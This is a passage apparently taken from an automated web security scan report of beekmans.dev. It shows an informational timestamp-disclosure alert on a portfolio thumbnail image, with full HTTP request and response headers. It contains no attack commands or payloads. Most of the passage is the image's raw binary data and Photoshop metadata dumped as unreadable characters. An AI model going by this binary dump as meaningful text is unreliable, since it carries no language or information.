¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          130277488
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        33. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          141194698, which evaluates to: 1974-06-23 05:44:58

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> 